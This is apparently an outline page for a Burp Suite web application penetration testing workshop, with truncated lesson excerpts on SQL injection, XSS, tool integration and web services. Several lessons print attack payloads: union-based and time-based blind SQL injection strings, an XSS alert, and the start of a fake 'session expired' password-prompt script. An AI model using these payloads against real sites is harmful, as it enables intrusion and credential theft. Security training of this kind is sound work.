Burp Suite Workshop

Web App Security Testing & Burp Suite Fundamentals 

Manual Web App Security Testing Fundamentals
Understanding how to use Burp Suite to perform a web app test
Integrating Burp with Skipfish
Integrating Burp with SQLMap

Day 2: Integrating Burp Suite with other tools and writing your own plugins 

Using Burp to mask Nikto headers
Running w3af plugins through Burp
Integrating Burp with SoapUI
Burp Suite Automation

Course By

Joseph McCray


C1L1: Course Materials

Author: Joseph McCray

Introduction: Welcome to the introductory tutorial to Burp Suite. It gives details about the installation and usage of Burp Suite, which is an essential tool for bug hunters and web application pentesters.

Learning Objectives:
- Learn how to install Burp Suite
- Understand how to use a Proxy connection to analyze web applications
- Understand how to use Burp Suite [...]

C1L2: Getting started with VMWare

Author: Joseph McCray

For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.

A 30-day trial of Workstation 11 can be downloaded from here: https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation/11_0

A 30-day trial of Fusion 7 can be downloaded from here: https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_fusion/7_0

The newest version of VMWare Player can be downloaded from here: https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_player/7_0

[...]

C1L3: Basic: Web Application Testing

Author: Joseph McCray

WEB APPLICATION TESTING

Most people are going to tell you to reference the OWASP Testing guide.
https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website. The key to doing a [...]

C1L4: SQL Injection

Author: Joseph McCray

Basic XSS

Cross-Site Scripting (XSS) is a type of injection attack in which a malicious script is delivered through an otherwise trusted website, breaching its security controls. The attack targets web applications and takes the form of a browser-side script. This injection attack takes [...]

C1L5: Union-Based SQL Injection

Author: Joseph McCray

order by 100--
order by 50--
order by 25--
order by 10--
order by 5--
order by 6--
order by 7--
order by 8--
order by 9--
union all select 1,2,3,4,5,6,7,8,9--

We are using a union select statement because we are joining the developer's query [...]

C1L6: Blind SQL Injection Testing

Author: Joseph McCray

BLIND SQL INJECTION TESTING

Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER

3 - Total Characters
; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)

Let's go for a quick check to see if [...]

C2L1: What is XSS

Author: Joseph McCray

WHAT IS XSS

https://s3.amazonaws.com/infosecaddicts-files/2-Intro_To_XSS.pptx

OK - what is Cross Site Scripting (XSS)

1. Use Firefox to browse to the following location:

A really simple search page that is vulnerable should come up.

2. In the search box type:

<script>alert('So this is XSS')</script>

This should pop-up an alert window with your message in it [...]

C2L2: A Better Way To Demo XSS

Author: Joseph McCray

XSS DEMO

Let's take this to the next level. We can modify this attack to include some username/password collection.

Paste all of this into the search box.

Use Firefox to browse to the following location:

Paste this into the search box

Option 1

<script> password=prompt('Your session is expired. Please enter your password to [...]

C3L1: Setting up Burp Suite

Author: Joseph McCray

Download latest free version of Burp at http://www.portswigger.net/burp/download.html

Make sure that burpsuite_free_v1.6.31.jar is set as executable (chmod +x burpsuite_free_v1.6.31.jar) and then run:

Installing JAVA

In Ubuntu open the terminal then run:

sudo add-apt-repository ppa:webupd8team/java
sudo apt-get update
sudo apt-get install oracle-java8-installer

Click the "Proxy" tab
Click the "Options" sub-tab
Click “Edit” in the “Proxy Listeners” section
In [...]

C3L2: Web Services

Author: Joseph McCray

WEB SERVICES

http://data.serviceplatform.org/wsdl_grabbing/seekda-wsdls.with_ini/36-CurrencyConvertor.wsdl

Question 1: What is the process that you use when you test?

Step 1: Automated Testing

Step 1a: Web Application vulnerability scanners
- Run two (2) unauthenticated vulnerability scans against the target
- Run two (2) authenticated vulnerability scans against the target with low-level user credentials
- Run two (2) authenticated [...]

C3L3: How much fuzzing is enough?

Author: Joseph McCray

There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else. Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do. Step 1: Ask yourself the 3 questions per page of [...]

C4L1: Nikto with Burp in Linux

Author: Joseph McCray

NIKTO WITH BURP

cd ~/toolz/
rm -rf nikto*
git clone https://github.com/sullo/nikto.git Nikto2
cd Nikto2/program
perl nikto -h http://zero.webappsecurity.com -useproxy http://localhost:8080/

Masking the Nikto header reference:
http://carnal0wnage.attackresearch.com/2009/09/btod-nikto-thru-burp-masking-nikto.html